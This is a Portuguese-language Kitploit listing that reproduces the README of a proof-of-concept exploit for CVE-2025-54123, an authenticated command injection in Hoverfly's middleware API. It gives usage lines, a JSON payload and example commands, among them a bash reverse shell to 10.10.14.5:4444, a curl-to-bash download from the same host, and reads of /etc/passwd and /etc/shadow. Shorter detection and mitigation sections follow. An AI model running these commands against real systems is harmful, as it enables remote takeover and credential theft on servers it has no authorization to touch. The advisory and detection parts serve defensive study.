Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-54123-Poc — CVE-2025-54123 Hoverfly Middleware Autenticado Injeção de Comando RCE | Kitploit
Ferramentas/GitHubGitHub/kasem545/cve-2025-54123-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly Middleware Autenticado Injeção de Comando RCE

Ver Repositório
72há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit CVE-2025-54123

Injeção de Comando RCE no Middleware Autenticado do Hoverfly | CVSS 9.8 CRÍTICO

Vulnerabilidade

Hoverfly <= 1.11.3 é vulnerável a injeção de comando autenticada através do endpoint /api/v2/hoverfly/middleware. São necessárias credenciais de administrador, mas uma vez autenticado, a funcionalidade de middleware aceita valores binários e de script fornecidos pelo usuário sem validação, permitindo a execução arbitrária de comandos.

Cadeia de Vulnerabilidade

  1. Validação de Entrada Insuficiente - middleware.go aceita caminhos binários arbitrários
  2. Execução Insegura de Comandos - local_middleware.go passa diretamente a entrada do usuário para exec.Command()
  3. Execução Imediata - hoverfly_service.go executa o middleware durante a validação

Requisitos

  • Credenciais de administrador válidas do Hoverfly (nome de usuário/senha)
  • Acesso à API de Administração do Hoverfly (porta padrão 8888)

Uso

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - Endpoint da API Hoverfly (obrigatório)
  • -u, --username - Nome de usuário admin (obrigatório)
  • -p, --password - Senha do admin (obrigatório)
  • -c, --command - Comando a executar (obrigatório)
  • --shell - Binário do shell a usar (padrão: /bin/bash)

Exemplos

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

Fluxo de Ataque

  1. Atacante autentica com credenciais de administrador válidas (Autenticação Básica)
  2. Envia requisição PUT para /api/v2/hoverfly/middleware com payload malicioso
  3. Hoverfly escreve o script em arquivo temporário /tmp/hoverfly_<random>
  4. Durante a validação, executa: <shell> /tmp/hoverfly_<random>
  5. Saída do comando retornada na seção STDOUT da resposta de erro
  6. Exploit extrai e exibe a saída

Estrutura do Payload

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

Cabeçalhos HTTP incluem:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

Impacto

  • Execução Remota Completa de Comandos com privilégios do processo Hoverfly
  • Roubo de Credenciais - roubar chaves de API, tokens, segredos
  • Pivô na Rede Interna - comprometer sistemas adjacentes
  • Exfiltração de Dados - acessar dados de simulação, configurações
  • Persistência - instalar backdoors, manter acesso
  • Interrupção de Serviço - modificar/excluir configurações de middleware

Locais de Código Vulneráveis

  • core/middleware/middleware.go:94-96 - Nenhuma validação de entrada no parâmetro binário
  • core/middleware/local_middleware.go:14-19 - Uso inseguro de exec.Command()
  • core/hoverfly_service.go:173 - Execução imediata durante a validação

Versões Afetadas

  • Hoverfly <= 1.11.3
  • Todas as instalações com API de Admin acessível e autenticação ativada

Detecção

Procure por:

  • Requisições PUT para /api/v2/hoverfly/middleware
  • Respostas de erro contendo "STDOUT:" com saída de comando
  • Arquivos temporários em /tmp/hoverfly/
  • Execuções incomuns de processos a partir do serviço hoverfly

Mitigação

  • Atualize para a versão corrigida (se disponível)
  • Restrinja o acesso à API de Admin apenas para IPs confiáveis
  • Use credenciais de autenticação fortes
  • Monitore o acesso ao endpoint /api/v2/hoverfly/middleware
  • Implemente validação de entrada nos parâmetros binário/script

Referências

  • CVE-2025-54123
  • CWE-78 (Injeção de Comando no SO)
  • CWE-20 (Validação de Entrada Incorreta)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

Créditos

Descoberta original: @Kr1shna4garwal

Baixar ferramenta